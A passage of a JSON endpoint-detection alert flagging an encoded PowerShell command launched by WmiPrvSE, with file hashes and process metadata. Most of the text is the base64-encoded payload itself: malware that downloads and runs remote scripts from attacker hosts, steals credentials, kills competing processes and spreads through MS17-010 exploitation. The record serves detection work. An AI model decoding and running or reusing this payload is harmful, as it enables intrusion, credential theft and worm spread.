kAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating 